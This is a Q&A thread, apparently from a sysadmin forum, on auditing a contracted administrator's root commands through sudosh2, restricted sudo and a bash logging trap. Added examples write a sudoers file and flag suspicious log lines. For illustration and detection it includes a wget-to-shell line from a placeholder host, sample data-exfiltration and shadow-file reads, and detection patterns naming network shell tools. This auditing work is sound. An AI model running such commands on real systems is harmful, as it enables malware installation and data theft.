Log every command executed from root
I want to give access to my root server to an external system administrator, but I want to be sure to double check what he is doing to my server, e.g. copying data I don't want them to do and so on. I would also like to keep track of whatever file is accessed, even in read only and not edited.
How can I do that?
Solution 1:
Trust, but verify!
Check out sudosh2. sudosh2 is provided by FreeBSD ports. Packages are available for RedHat and Ubuntu. Here is the description from their website:
sudosh is an auditing shell filter and can be used as a login shell. Sudosh records all keystrokes and output and can play back the session just like a VCR.
Sudosh will allow you to replay the user's session, which will allow you to see all input and output as the user saw it. You see everything: keystrokes, typos, backspaces, what they edited in vi, the output of wget -O- http://zyxzyxzyxzyx.ru/haxor/malware | /bin/sh, etc.
It's possible to send sudosh logs to syslog, so that they can be stored on a central syslog server away from the system.
Note that sudosh2 is a replacement for sudosh, which was abandoned by its author.
Do you work at an academic institution where users insist on having superuser privileges? Or do you work at a corporation and want to allow users to have superuser privileges on their own VMs? This might be the solution for you.
Solution 2:
Don't give him root access. Instead, give him an un-privileged user account and request that he do all of his work through sudo, which will log all of his commands.
Keep in mind that if this person has ill intentions and you give him full sudo privileges, he will find a way to carry out those ill intentions without those commands being logged. In this case, only grant him access to the specific commands he needs to do his job.
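As an added example (not part of this answer), here is a small POSIX sh helper that writes a sudoers drop-in granting a hypothetical user "contractor" only the commands he needs, with sudo's own logging switched on, and checks the result with visudo -c. The user name, the command list and the log path are assumptions made for illustration; logfile, log_input, log_output and noexec are standard sudoers options, and the commented-out "ALL" line shows the over-broad grant the answer warns against.

```shell
#!/bin/sh
# Added example: restrict a named user to specific commands via sudo, and log them.
# "contractor", the nginx commands and /var/log/sudo.log are constructed placeholders.

write_sudoers_fragment() {
    # $1: destination path (normally /etc/sudoers.d/contractor, owned by root, mode 0440)
    cat >"$1" <<'EOF'
# Too broad: every command runs as root, and a shell escape is one step away.
#   contractor ALL=(ALL) ALL

# Named commands only. Full paths and no wildcards: a "*" in sudoers also
# matches spaces, so "tail -n * /var/log/*" would accept extra file arguments.
Cmnd_Alias CONTRACTOR_CMDS = /usr/bin/systemctl status nginx, \
                             /usr/bin/systemctl restart nginx, \
                             /usr/bin/journalctl --no-pager -u nginx
contractor ALL=(root) CONTRACTOR_CMDS

# Log every invocation, keep the session I/O for replay with sudoreplay,
# and stop the permitted commands from executing further programs.
Defaults:contractor logfile=/var/log/sudo.log
Defaults:contractor log_input, log_output
Defaults:contractor noexec
EOF
    chmod 0440 "$1"
}

check_sudoers_fragment() {
    # visudo -c parses the file without installing it
    if command -v visudo >/dev/null 2>&1; then
        visudo -c -f "$1"
    else
        echo "visudo not found; skipping syntax check" >&2
    fi
}

# Usage (as root):
#   write_sudoers_fragment /etc/sudoers.d/contractor
#   check_sudoers_fragment /etc/sudoers.d/contractor
```

The drop-in keeps the commands exact so that sudo's logfile entry is the whole story of what ran; noexec is what prevents a permitted command from being used as a stepping stone to an unlogged shell.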
Solution 3:
I'm not familiar with sudosh2, but I put the following in my .bashrc to log all the commands I type in a bash shell to the file ~/.command_log:
# log every command typed and when
# (caller succeeds inside a function or sourced file, so only top-level commands are logged)
if [ -n "${BASH_VERSION}" ]; then
    trap "caller >/dev/null || \
printf '%s\\n' \"\$(date '+%Y-%m-%dT%H:%M:%S%z')\
 \$(tty) \${BASH_COMMAND}\" 2>/dev/null >>~/.command_log" DEBUG
fi
The above sets a trap on DEBUG, which is executed just before an ordinary command is executed. The caller built-in is used to test whether the command is being typed at an interactive shell or run via something like .bashrc. The value ${BASH_COMMAND} contains the command currently being executed.
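As an added example (not part of this answer), here is a POSIX sh/awk reviewer for the ~/.command_log file that the DEBUG trap above produces. Each line has the form "<timestamp> <tty> <command ...>"; the sample lines are constructed, and the host names and paths in them are placeholders. Because the DEBUG trap fires once per simple command, a pipeline such as "wget ... | /bin/sh" shows up as two consecutive lines, and the sample mirrors that.

```shell
#!/bin/sh
# Added example: pick out the lines of a ~/.command_log worth a second look.
# The log below is constructed; 203.0.113.5 and dropper.invalid are placeholders.

SAMPLE_LOG='2024-03-01T09:12:01+0000 /dev/pts/0 ls /srv/data
2024-03-01T09:12:40+0000 /dev/pts/0 scp -r /srv/data/customers backup@203.0.113.5:/tmp
2024-03-01T09:13:05+0000 /dev/pts/0 vi /etc/nginx/nginx.conf
2024-03-01T09:14:22+0000 /dev/pts/0 wget -O- http://dropper.invalid/payload
2024-03-01T09:14:22+0000 /dev/pts/0 /bin/sh
2024-03-01T09:15:00+0000 /dev/pts/0 cat /etc/shadow
2024-03-01T09:15:30+0000 /dev/pts/0 history -c'

# flag_commands: read log lines on stdin, print the ones matching a category:
#   TRANSFER  bulk copy tools that can move data off the host
#   FETCH     network fetchers pulling content in from outside
#   SHELL     a shell started directly (often the second half of "fetch | sh")
#   CREDS     reads of credential or sudo configuration files
#   TAMPER    attempts to clear the shell history
flag_commands() {
    awk '
        { cmd = $3; rest = ""; for (i = 4; i <= NF; i++) rest = rest " " $i }
        cmd ~ /^(scp|rsync|sftp|nc|ncat|socat)$/             { print "TRANSFER " $0; next }
        cmd ~ /^(curl|wget)$/                               { print "FETCH    " $0; next }
        cmd ~ /^(\/bin\/|\/usr\/bin\/)?(sh|bash|dash|zsh)$/ { print "SHELL    " $0; next }
        rest ~ /\/etc\/(shadow|gshadow|sudoers)/            { print "CREDS    " $0; next }
        cmd == "history" && rest ~ / -c/                    { print "TAMPER   " $0; next }
    '
}

# count_flagged: number of flagged lines in the log fed on stdin
count_flagged() {
    flag_commands | wc -l | tr -d ' '
}

# Run against the constructed sample; for a real review use: flag_commands < ~/.command_log
printf '%s\n' "$SAMPLE_LOG" | flag_commands
```

The categories are deliberately coarse: the point is to surface the handful of lines a human should read, not to decide by themselves. Note that the log sits in the user's own home directory and the trap lives in his .bashrc, so this is an accountability record rather than an enforcement mechanism, which is the same limitation the sudo answer points out.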